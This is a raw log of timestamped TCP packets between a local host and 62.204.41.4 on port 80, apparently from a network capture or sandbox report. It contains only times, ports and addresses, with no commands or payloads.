                                                        Feb 6, 2023 14:16:28.831883907 CET4969180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.832230091 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.832691908 CET4969180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.837604046 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.893048048 CET804969162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.896934986 CET804969162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.897242069 CET4969180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.898154974 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.898228884 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.898444891 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.917882919 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979309082 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979448080 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979521990 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979547977 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979557991 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979572058 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979600906 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979600906 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979610920 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979619026 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979743958 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979794979 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979820967 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979856014 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979860067 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979882002 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979888916 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979907036 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:28.979911089 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:28.979964018 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.013803959 CET4969180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.014635086 CET4969280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.046888113 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.046931982 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.046952009 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.046972036 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.046992064 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.046991110 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047034025 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047058105 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047105074 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047126055 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047148943 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047149897 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047173977 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047188044 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047194958 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047209978 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047220945 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047240973 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047244072 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047276020 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047297955 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047415972 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047446012 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047472954 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047499895 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047504902 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047525883 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047538042 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047553062 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047564030 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047579050 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047599077 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047605038 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.047622919 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.047663927 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.075155020 CET804969162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.075292110 CET4969180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.077096939 CET804969262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.077253103 CET4969280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.077816010 CET4969280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.110882044 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.110927105 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.110959053 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.111005068 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.111056089 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.118885040 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.118927956 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.118953943 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.118980885 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119009972 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119028091 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119038105 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119065046 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119077921 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119077921 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119093895 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119107008 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119122028 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119149923 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119158983 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119178057 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119184017 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119205952 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119215965 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119235039 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119260073 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119270086 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119287968 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119297028 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119316101 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119322062 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119343996 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119371891 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119396925 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119399071 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119421005 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119425058 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119446993 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119452953 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119465113 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119478941 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119505882 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119517088 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119532108 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119548082 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119559050 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119571924 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119585991 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119595051 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119613886 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119620085 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119641066 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119646072 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119668961 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119707108 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119716883 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119743109 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119769096 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119781971 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119795084 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119802952 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119822979 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119831085 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119851112 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119854927 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119879961 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119905949 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.119915962 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.119940042 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.140969038 CET804969262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.144706964 CET804969262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.144869089 CET4969280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.171498060 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.171515942 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.171679020 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.260165930 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.260546923 CET4969280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.262876034 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.321274996 CET804969062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.322679996 CET804969262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.322840929 CET4969080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.323364019 CET4969280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.324933052 CET804969362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.325140953 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.330240011 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.392095089 CET804969362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.404603004 CET804969362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.405294895 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.513690948 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.514444113 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.577439070 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.577461958 CET804969362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.577547073 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.577590942 CET4969380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.585295916 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.646075964 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.649504900 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.653402090 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.763591051 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.764683008 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.824440956 CET804969462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.825571060 CET4969480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.826432943 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.826551914 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.833365917 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:29.894077063 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.896542072 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:29.896730900 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.015897036 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.016649961 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.077560902 CET804969562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.077868938 CET4969580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.081624031 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.081865072 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.082324028 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.145374060 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.151854992 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.153008938 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.267267942 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.268034935 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.330276012 CET804969662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.330461025 CET4969680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.330821991 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.330940008 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.331432104 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.396003008 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.398885965 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.399019003 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.513561964 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.514549017 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.575536013 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.575699091 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.576133013 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.579301119 CET804969762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.579402924 CET4969780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.636229992 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.639316082 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.639472961 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.748692989 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.750433922 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.809381962 CET804969862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.809444904 CET4969880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.810801983 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.810889959 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.811357975 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.874603033 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.874645948 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:30.874768972 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.982218981 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:30.982970953 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.042591095 CET804969962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.042728901 CET4969980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.043292046 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.043406963 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.043766975 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.124670029 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.124840975 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.124898911 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.232711077 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.233705044 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.293167114 CET804970062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.293382883 CET4970080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.296154022 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.296464920 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.297622919 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.359807968 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.362792015 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.362927914 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.482449055 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.483194113 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.543910980 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.544033051 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.544042110 CET804970162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.544162035 CET4970180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.544826984 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.605264902 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.609515905 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.609659910 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.720773935 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.721662998 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.781966925 CET804970262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.782066107 CET4970280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.783037901 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.783169031 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.801911116 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.863517046 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.868216991 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:31.868396997 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.982759953 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:31.983603001 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.045079947 CET804970362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.045178890 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.045177937 CET4970380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.045264006 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.045624018 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.108331919 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.117239952 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.117358923 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.253287077 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.261163950 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.316380978 CET804970462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.317768097 CET4970480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.322765112 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.322890043 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.323528051 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.383878946 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.386897087 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.389538050 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.500999928 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.501689911 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.561602116 CET804970562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.561858892 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.561966896 CET4970580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.562031031 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.563263893 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.624953985 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.627523899 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.629777908 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.732887983 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.733944893 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.792391062 CET804970662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.792474031 CET4970680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.796664000 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.797704935 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.799134016 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.861947060 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.866416931 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:32.866545916 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.983104944 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:32.984055042 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.046968937 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.047508955 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.047919035 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.050724030 CET804970762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.050820112 CET4970780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.107681990 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.112329960 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.113776922 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.223474979 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.224272966 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.283612013 CET804970862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.283751965 CET4970880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.286875010 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.287100077 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.287571907 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.350275040 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.353867054 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.354121923 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.466859102 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.467489958 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.533123970 CET804970962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.533155918 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.533293009 CET4970980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.533334017 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.533909082 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.597686052 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.601789951 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.601977110 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.717964888 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.719047070 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.780078888 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.780221939 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.780905008 CET804971062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.780977964 CET4971080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.781092882 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:33.840681076 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.843689919 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:33.843822956 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.035156965 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.036046982 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.095686913 CET804971162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.095779896 CET4971180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.104942083 CET804971262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:16:34.105112076 CET4971280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:16:34.380434036 CET4971280192.168.2.562.204.41.4
